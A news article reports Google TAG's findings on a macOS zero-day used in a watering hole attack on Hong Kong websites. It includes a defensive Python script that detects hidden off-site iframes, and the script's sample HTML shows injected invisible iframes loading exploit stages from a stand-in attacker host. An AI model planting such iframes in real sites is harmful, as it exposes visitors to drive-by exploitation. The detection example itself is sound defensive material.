Hackers Exploit macOS Zero-Day Vulnerability: Google Warns

Google’s Threat Analysis Group considers the hack to be a watering hole attack.


Google's Threat Analysis Group (TAG) determined that attackers targeting visitors to Hong Kong websites had likely been exploiting a previously unreported zero-day vulnerability in macOS to record keystrokes and capture screenshots. Apple patched the flaw, tracked as CVE-2021-30869, in September, around a month after Google researchers identified it. Apple indicated that it was aware of reports that an exploit for the vulnerability existed in the wild and that a malicious application could use it to run arbitrary code with kernel privileges.

Google has also disclosed further details, stating that this was a "watering hole" attack, in which attackers compromise websites chosen for the profile of their typical visitors. The attacks were aimed at both Mac and iPhone users.

"A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of reports that an exploit for this issue exists in the wild," Apple said, crediting Google TAG researchers with reporting the flaw.

The watering hole exploited an XNU privilege escalation vulnerability in macOS Catalina that was unpatched at the time, resulting in the installation of a backdoor.

"The websites leveraged for the attacks contained two iframes which served exploits from an attacker-controlled server -- one for iOS and the other for macOS," said Erye Hernandez of Google TAG. 
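Because the exploits were served through iframes injected into legitimate pages, one check a site operator can run is a scan of their own HTML for iframes that load content from another origin, especially ones sized or styled to be invisible. The following script is an added example written for this article, not code from Google TAG or the original post; the page URL, the sample HTML and the `attacker-controlled.example` hostnames in it are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def _is_hidden(attrs):
    """True when the iframe is zero-sized or styled not to render."""
    if attrs.get("width") == "0" or attrs.get("height") == "0":
        return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def find_offsite_iframes(html, page_url):
    """Return (src, hidden) for each iframe whose src points at a different
    host than the page itself. Relative srcs are same-origin and skipped;
    protocol-relative srcs ("//host/path") are treated as off-site when the
    host differs."""
    parser = IframeCollector()
    parser.feed(html)
    page_host = urlparse(page_url).netloc.lower()
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src")
        if not src:
            continue
        host = urlparse(src).netloc.lower()
        if host and host != page_host:
            findings.append((src, _is_hidden(attrs)))
    return findings


# Constructed sample page: one legitimate same-origin embed and two injected,
# hidden iframes pulling content from a different (hypothetical) host.
SAMPLE_HTML = """
<html><body>
<h1>Latest news</h1>
<iframe src="/embed/video?id=12" width="640" height="360"></iframe>
<iframe src="https://ios.attacker-controlled.example/stage1" width="0" height="0" style="display:none"></iframe>
<iframe src="//macos.attacker-controlled.example/stage1" style="visibility: hidden"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, hidden in find_offsite_iframes(SAMPLE_HTML, "https://news.example/story"):
        print(f"off-site iframe: {src} (hidden={hidden})")
```

A scan like this belongs in a site's periodic integrity checks alongside a file-hash baseline; an off-site iframe that is also hidden is a strong signal that page content has been tampered with rather than legitimately embedded.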

"We believe this threat actor to be a well-resourced group, likely state-backed, with access to their own software engineering team based on the quality of the payload code," he added. 

The attackers combined the earlier disclosed XNU flaw, CVE-2020-27932, with an associated exploit into a privilege-escalation chain that granted them root privileges on a targeted Mac. Once they had root, they downloaded a payload that ran silently in the background on affected Macs. According to Google TAG, the malware's architecture signals a well-resourced attacker.

"The payload seems to be a product of extensive software engineering. It uses a publish-subscribe model via a Data Distribution Service (DDS) framework for communicating with the C2. It also has several components, some of which appear to be configured as modules," notes Hernandez. 

The backdoor had the typical characteristics of malware designed to spy on a victim, such as device fingerprinting, screen capture, the capacity to upload and download files, and the ability to execute terminal commands. In addition, the spyware can record audio and log keystrokes. Google did not reveal the websites that were targeted but did mention that they included a "media outlet and a prominent pro-democracy labor and political group" relating to Hong Kong news.